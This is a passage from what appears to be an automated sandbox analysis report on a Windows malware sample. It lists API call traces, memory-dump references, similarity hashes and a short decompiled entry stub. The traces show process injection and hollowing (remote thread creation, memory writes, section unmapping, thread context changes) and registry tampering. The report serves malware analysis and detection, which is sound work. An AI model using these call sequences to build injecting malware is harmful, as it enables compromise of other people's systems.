    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}
APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:C007415B17DF758F2ED04850F95EE60E
Total matches:31
Initial Analysis Report:Open
Initial sample Analysis ID:64002
Initial sample SHA 256:212D2CE18964D507A6FE50EE7C33E5EC4FC6B44DEDCC9463D5F6E2581E48E4C3
Initial sample name:crypt_0001_1096a.exe

Similar Executed Functions

Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
